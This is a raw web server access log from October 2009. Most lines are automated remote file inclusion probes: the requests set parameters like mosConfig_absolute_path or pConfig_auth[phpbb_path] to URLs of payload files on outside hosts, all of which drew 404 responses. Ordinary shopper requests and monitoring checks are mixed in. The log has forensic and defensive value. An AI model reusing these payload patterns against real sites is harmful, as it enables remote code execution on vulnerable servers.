66.212.27.13 - - [12/Oct/2009:01:43:41 -0400] "GET //index.php?DOCUMENT_ROOT=http://hisandhershaircare.com//images/y.gif?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
66.212.27.13 - - [12/Oct/2009:01:43:41 -0400] "GET /logs/access_log.Q109092200//index.php?DOCUMENT_ROOT=http://hisandhershaircare.com//images/y.gif?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
66.212.27.13 - - [12/Oct/2009:01:43:41 -0400] "GET /logs//index.php?DOCUMENT_ROOT=http://hisandhershaircare.com//images/y.gif?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
66.212.27.13 - - [12/Oct/2009:01:43:41 -0400] "GET /logs//index.php?DOCUMENT_ROOT=http://hisandhershaircare.com//images/y.gif?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
66.212.27.13 - - [12/Oct/2009:01:43:41 -0400] "GET /logs/access_log.Q109092200//index.php?DOCUMENT_ROOT=http://hisandhershaircare.com//images/y.gif?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
66.212.27.13 - - [12/Oct/2009:01:43:42 -0400] "GET //index.php?DOCUMENT_ROOT=http://hisandhershaircare.com//images/y.gif?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
66.225.246.18 - - [12/Oct/2009:01:44:13 -0400] "GET /logs//index.php?option=com_content&task=ionid=&id=&mosConfig_absolute_path=http://www.mismaquinas.com/nueva//banners/baner.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
66.225.246.18 - - [12/Oct/2009:01:44:13 -0400] "GET //index.php?option=com_content&task=ionid=&id=&mosConfig_absolute_path=http://www.mismaquinas.com/nueva//banners/baner.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
66.225.246.18 - - [12/Oct/2009:01:44:14 -0400] "GET /logs/access_log.Q109081300//index.php?option=com_content&task=ionid=&id=&mosConfig_absolute_path=http://www.mismaquinas.com/nueva//banners/baner.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
210.127.253.244 - - [12/Oct/2009:01:44:16 -0400] "GET /logs/access_log.Q109050900%20%20/?_SERVER[DOCUMENT_ROOT]=http://www.usher.co.kr/bbs/id1.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
66.29.146.110 - - [12/Oct/2009:01:44:24 -0400] "GET /logs/access_log.Q109092200%20%20//index.php?DOCUMENT_ROOT=http://hisandhershaircare.com//images/y.gif?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
66.225.246.18 - - [12/Oct/2009:01:44:26 -0400] "GET /logs/access_log.Q109070300//index.php?option=com_content&task=ionid=&id=&mosConfig_absolute_path=http://www.mismaquinas.com/nueva//banners/baner.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
211.111.160.5 - - [12/Oct/2009:01:44:29 -0400] "GET //index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/id1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
211.111.160.5 - - [12/Oct/2009:01:44:29 -0400] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
211.111.160.5 - - [12/Oct/2009:01:44:29 -0400] "GET /logs/access_log.Q109071200%20%20//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
211.111.160.5 - - [12/Oct/2009:01:44:46 -0400] "GET /logs/access_log.Q109063000%20%20//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
209.59.12.99 - - [12/Oct/2009:01:44:51 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
210.127.253.244 - - [12/Oct/2009:01:45:16 -0400] "GET /logs/access_log.Q109053000%20%20/?_SERVER[DOCUMENT_ROOT]=http://www.usher.co.kr/bbs/id1.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
82.193.15.3 - - [12/Oct/2009:01:45:19 -0400] "GET /logs/access_log.Q109071200%20%20//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
66.212.27.13 - - [12/Oct/2009:01:45:21 -0400] "GET /logs/access_log.Q109092200%20%20//index.php?DOCUMENT_ROOT=http://hisandhershaircare.com//images/y.gif?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
210.127.253.244 - - [12/Oct/2009:01:45:23 -0400] "GET /logs/access_log.Q109100200%20%20/?_SERVER[DOCUMENT_ROOT]=http://www.usher.co.kr/bbs/id1.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
66.212.27.13 - - [12/Oct/2009:01:45:23 -0400] "GET /logs/access_log.Q109092200%20%20//index.php?DOCUMENT_ROOT=http://hisandhershaircare.com//images/y.gif?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
210.127.253.244 - - [12/Oct/2009:01:45:42 -0400] "GET /logs/access_log.Q109062800%20%20/?_SERVER[DOCUMENT_ROOT]=http://www.usher.co.kr/bbs/id1.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
81.176.226.170 - - [12/Oct/2009:01:46:11 -0400] "GET /logs//index.php?option=com_content&task=ionid=&id=&mosConfig_absolute_path=http://www.mismaquinas.com/nueva//banners/baner.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
81.176.226.170 - - [12/Oct/2009:01:46:11 -0400] "GET //index.php?option=com_content&task=ionid=&id=&mosConfig_absolute_path=http://www.mismaquinas.com/nueva//banners/baner.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
81.176.226.170 - - [12/Oct/2009:01:46:11 -0400] "GET /logs/access_log.Q109081300//index.php?option=com_content&task=ionid=&id=&mosConfig_absolute_path=http://www.mismaquinas.com/nueva//banners/baner.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
210.127.253.244 - - [12/Oct/2009:01:46:11 -0400] "GET /logs/access_log.Q109051000%20%20/?_SERVER[DOCUMENT_ROOT]=http://www.usher.co.kr/bbs/id1.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
210.127.253.244 - - [12/Oct/2009:01:46:12 -0400] "GET /logs/access_log.Q109062300%20%20/?_SERVER[DOCUMENT_ROOT]=http://www.usher.co.kr/bbs/id1.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
81.176.226.170 - - [12/Oct/2009:01:46:16 -0400] "GET /logs/access_log.Q109070300//index.php?option=com_content&task=ionid=&id=&mosConfig_absolute_path=http://www.mismaquinas.com/nueva//banners/baner.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
99.140.230.46 - - [12/Oct/2009:01:46:56 -0400] "POST /cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):SMNSIGN HTTP/1.1" 200 37789 "http://acesurgical.com/home.html" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_1; en-us) AppleWebKit/531.9 (KHTML, like Gecko) Version/4.0.3 Safari/531.9"
99.140.230.46 - - [12/Oct/2009:01:46:57 -0400] "GET /images/head_btn-space1.gif HTTP/1.1" 200 5036 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):SMNSIGN" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_1; en-us) AppleWebKit/531.9 (KHTML, like Gecko) Version/4.0.3 Safari/531.9"
99.140.230.46 - - [12/Oct/2009:01:46:57 -0400] "GET /images/head_btn-shop.gif HTTP/1.1" 200 1970 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):SMNSIGN" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_1; en-us) AppleWebKit/531.9 (KHTML, like Gecko) Version/4.0.3 Safari/531.9"
99.140.230.46 - - [12/Oct/2009:01:46:57 -0400] "GET /images/head_btn-catalogs.gif HTTP/1.1" 200 1729 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):SMNSIGN" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_1; en-us) AppleWebKit/531.9 (KHTML, like Gecko) Version/4.0.3 Safari/531.9"
99.140.230.46 - - [12/Oct/2009:01:46:57 -0400] "GET /images/head_aceLogo.gif HTTP/1.1" 200 984 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):SMNSIGN" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_1; en-us) AppleWebKit/531.9 (KHTML, like Gecko) Version/4.0.3 Safari/531.9"
99.140.230.46 - - [12/Oct/2009:01:46:57 -0400] "GET /images/head_btn-products.gif HTTP/1.1" 200 1531 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):SMNSIGN" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_1; en-us) AppleWebKit/531.9 (KHTML, like Gecko) Version/4.0.3 Safari/531.9"
99.140.230.46 - - [12/Oct/2009:01:46:57 -0400] "GET /images/head_surgical-supply.gif HTTP/1.1" 200 764 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):SMNSIGN" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_1; en-us) AppleWebKit/531.9 (KHTML, like Gecko) Version/4.0.3 Safari/531.9"
99.140.230.46 - - [12/Oct/2009:01:46:57 -0400] "GET /images/head_btn-brochures.gif HTTP/1.1" 200 1768 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):SMNSIGN" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_1; en-us) AppleWebKit/531.9 (KHTML, like Gecko) Version/4.0.3 Safari/531.9"
99.140.230.46 - - [12/Oct/2009:01:46:57 -0400] "GET /images/head_btn-aboutUs.gif HTTP/1.1" 200 1459 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):SMNSIGN" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_1; en-us) AppleWebKit/531.9 (KHTML, like Gecko) Version/4.0.3 Safari/531.9"
99.140.230.46 - - [12/Oct/2009:01:46:57 -0400] "GET /images/head_btn-tutorials.gif HTTP/1.1" 200 1160 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):SMNSIGN" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_1; en-us) AppleWebKit/531.9 (KHTML, like Gecko) Version/4.0.3 Safari/531.9"
99.140.230.46 - - [12/Oct/2009:01:46:57 -0400] "GET /images/head_btn-seminars.gif HTTP/1.1" 200 1250 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):SMNSIGN" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_1; en-us) AppleWebKit/531.9 (KHTML, like Gecko) Version/4.0.3 Safari/531.9"
99.140.230.46 - - [12/Oct/2009:01:46:57 -0400] "GET /images/head_btn-conventions.gif HTTP/1.1" 200 1367 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):SMNSIGN" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_1; en-us) AppleWebKit/531.9 (KHTML, like Gecko) Version/4.0.3 Safari/531.9"
99.140.230.46 - - [12/Oct/2009:01:46:57 -0400] "GET /images/head_btn-contactUs.gif HTTP/1.1" 200 1235 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):SMNSIGN" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_1; en-us) AppleWebKit/531.9 (KHTML, like Gecko) Version/4.0.3 Safari/531.9"
99.140.230.46 - - [12/Oct/2009:01:46:57 -0400] "GET /images/head_btn-spacer2.gif HTTP/1.1" 200 2237 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):SMNSIGN" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_1; en-us) AppleWebKit/531.9 (KHTML, like Gecko) Version/4.0.3 Safari/531.9"
99.140.230.46 - - [12/Oct/2009:01:46:57 -0400] "GET /images/blend.jpg HTTP/1.1" 200 405 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):SMNSIGN" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_1; en-us) AppleWebKit/531.9 (KHTML, like Gecko) Version/4.0.3 Safari/531.9"
99.140.230.46 - - [12/Oct/2009:01:46:57 -0400] "GET /images/head_aceLogo-over.gif HTTP/1.1" 200 1296 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):SMNSIGN" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_1; en-us) AppleWebKit/531.9 (KHTML, like Gecko) Version/4.0.3 Safari/531.9"
211.172.225.50 - - [12/Oct/2009:01:47:32 -0400] "GET /logs//path/authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
211.172.225.50 - - [12/Oct/2009:01:47:32 -0400] "GET /logs/access_log.Q109071200//path/authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
211.172.225.50 - - [12/Oct/2009:01:47:32 -0400] "GET //path/authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
211.172.225.50 - - [12/Oct/2009:01:47:33 -0400] "GET //path/authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
211.172.225.50 - - [12/Oct/2009:01:47:33 -0400] "GET /logs//path/authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
211.172.225.50 - - [12/Oct/2009:01:47:34 -0400] "GET /logs/access_log.Q109071200//path/authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
211.111.160.5 - - [12/Oct/2009:01:47:52 -0400] "GET /logs/error_log.Q109071200//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/id1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
211.111.160.5 - - [12/Oct/2009:01:47:54 -0400] "GET /logs/error_log.Q109082100//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/id1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
81.176.226.170 - - [12/Oct/2009:01:47:59 -0400] "GET /logs/access_log.Q109081300%20%20//index.php?option=com_content&task=ionid=&id=&mosConfig_absolute_path=http://www.mismaquinas.com/nueva//banners/baner.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
81.176.226.170 - - [12/Oct/2009:01:47:59 -0400] "GET /logs/access_log.Q109070300%20%20//index.php?option=com_content&task=ionid=&id=&mosConfig_absolute_path=http://www.mismaquinas.com/nueva//banners/baner.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
211.40.68.132 - - [12/Oct/2009:01:48:03 -0400] "GET //path/authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
211.40.68.132 - - [12/Oct/2009:01:48:03 -0400] "GET /logs//path/authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
211.40.68.132 - - [12/Oct/2009:01:48:04 -0400] "GET /logs/access_log.Q109071200//path/authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
211.40.68.132 - - [12/Oct/2009:01:48:05 -0400] "GET //path/authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
211.40.68.132 - - [12/Oct/2009:01:48:05 -0400] "GET /logs//path/authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
211.40.68.132 - - [12/Oct/2009:01:48:05 -0400] "GET /logs/access_log.Q109071200//path/authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
99.140.230.46 - - [12/Oct/2009:01:48:11 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):SMNSIGN" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_1; en-us) AppleWebKit/531.9 (KHTML, like Gecko) Version/4.0.3 Safari/531.9"
99.140.230.46 - - [12/Oct/2009:01:48:12 -0400] "GET /images/head_btn-products-over.gif HTTP/1.1" 200 1396 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):SMNSIGN" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_1; en-us) AppleWebKit/531.9 (KHTML, like Gecko) Version/4.0.3 Safari/531.9"
99.140.230.46 - - [12/Oct/2009:01:48:12 -0400] "GET /images/head_btn-seminars-over.gif HTTP/1.1" 200 1089 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):SMNSIGN" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_1; en-us) AppleWebKit/531.9 (KHTML, like Gecko) Version/4.0.3 Safari/531.9"
99.140.230.46 - - [12/Oct/2009:01:48:12 -0400] "GET /images/head_btn-catalog-over.gif HTTP/1.1" 200 1354 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):SMNSIGN" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_1; en-us) AppleWebKit/531.9 (KHTML, like Gecko) Version/4.0.3 Safari/531.9"
99.140.230.46 - - [12/Oct/2009:01:48:12 -0400] "GET /images/head_btn-aboutUs-over.gif HTTP/1.1" 200 1156 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):SMNSIGN" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_1; en-us) AppleWebKit/531.9 (KHTML, like Gecko) Version/4.0.3 Safari/531.9"
99.140.230.46 - - [12/Oct/2009:01:48:12 -0400] "GET /images/head_btn-brochures-over.gif HTTP/1.1" 200 1392 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):SMNSIGN" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_1; en-us) AppleWebKit/531.9 (KHTML, like Gecko) Version/4.0.3 Safari/531.9"
99.140.230.46 - - [12/Oct/2009:01:48:12 -0400] "GET /images/head_btn-tutorials-over.gif HTTP/1.1" 200 1097 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):SMNSIGN" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_1; en-us) AppleWebKit/531.9 (KHTML, like Gecko) Version/4.0.3 Safari/531.9"
99.140.230.46 - - [12/Oct/2009:01:48:12 -0400] "GET /images/head_btn-shop-over.gif HTTP/1.1" 200 1473 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):SMNSIGN" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_1; en-us) AppleWebKit/531.9 (KHTML, like Gecko) Version/4.0.3 Safari/531.9"
99.140.230.46 - - [12/Oct/2009:01:48:12 -0400] "GET /images/head_btn-conventions-over.gif HTTP/1.1" 200 1195 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):SMNSIGN" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_1; en-us) AppleWebKit/531.9 (KHTML, like Gecko) Version/4.0.3 Safari/531.9"
99.140.230.46 - - [12/Oct/2009:01:48:12 -0400] "GET /images/head_btn-contactUs-over.gif HTTP/1.1" 200 1110 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):SMNSIGN" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_1; en-us) AppleWebKit/531.9 (KHTML, like Gecko) Version/4.0.3 Safari/531.9"
211.172.225.50 - - [12/Oct/2009:01:48:37 -0400] "GET //path/authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
211.172.225.50 - - [12/Oct/2009:01:48:37 -0400] "GET /logs/access_log.Q109071200%20%20//path/authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
211.172.225.50 - - [12/Oct/2009:01:48:37 -0400] "GET /logs//path/authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
211.172.225.50 - - [12/Oct/2009:01:48:41 -0400] "GET /logs/access_log.Q109071200%20%20//path/authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
211.172.225.50 - - [12/Oct/2009:01:48:41 -0400] "GET //path/authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
211.172.225.50 - - [12/Oct/2009:01:48:41 -0400] "GET /logs//path/authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
211.40.68.132 - - [12/Oct/2009:01:49:36 -0400] "GET //path/authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
211.40.68.132 - - [12/Oct/2009:01:49:36 -0400] "GET /logs/access_log.Q109071200%20%20//path/authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
211.40.68.132 - - [12/Oct/2009:01:49:36 -0400] "GET /logs//path/authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
211.40.68.132 - - [12/Oct/2009:01:49:50 -0400] "GET //path/authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
211.40.68.132 - - [12/Oct/2009:01:49:51 -0400] "GET /logs/access_log.Q109071200%20%20//path/authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
211.40.68.132 - - [12/Oct/2009:01:49:51 -0400] "GET /logs//path/authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
209.59.12.99 - - [12/Oct/2009:01:49:51 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
85.128.60.100 - - [12/Oct/2009:01:51:22 -0400] "GET //index.php?option=com_content&task=ionid=&id=&mosConfig_absolute_path=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
85.128.60.100 - - [12/Oct/2009:01:51:23 -0400] "GET /logs//index.php?option=com_content&task=ionid=&id=&mosConfig_absolute_path=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
85.128.60.100 - - [12/Oct/2009:01:51:23 -0400] "GET /logs/access_log.Q109081300//index.php?option=com_content&task=ionid=&id=&mosConfig_absolute_path=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
85.128.60.100 - - [12/Oct/2009:01:51:36 -0400] "GET /logs/access_log.Q109070300//index.php?option=com_content&task=ionid=&id=&mosConfig_absolute_path=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
211.172.225.50 - - [12/Oct/2009:01:52:04 -0400] "GET //path/authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
211.172.225.50 - - [12/Oct/2009:01:52:04 -0400] "GET /logs/access_log.Q109071200//path/authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
211.172.225.50 - - [12/Oct/2009:01:52:04 -0400] "GET /logs//path/authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
211.172.225.50 - - [12/Oct/2009:01:52:05 -0400] "GET //path/authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
211.172.225.50 - - [12/Oct/2009:01:52:05 -0400] "GET /logs/access_log.Q109071200//path/authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
211.172.225.50 - - [12/Oct/2009:01:52:05 -0400] "GET /logs//path/authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
211.40.68.132 - - [12/Oct/2009:01:52:33 -0400] "GET //path/authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
211.40.68.132 - - [12/Oct/2009:01:52:33 -0400] "GET /logs//path/authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
211.40.68.132 - - [12/Oct/2009:01:52:34 -0400] "GET /logs/access_log.Q109071200//path/authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
211.40.68.132 - - [12/Oct/2009:01:52:34 -0400] "GET //path/authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
211.40.68.132 - - [12/Oct/2009:01:52:35 -0400] "GET /logs//path/authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
211.40.68.132 - - [12/Oct/2009:01:52:35 -0400] "GET /logs/access_log.Q109071200//path/authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
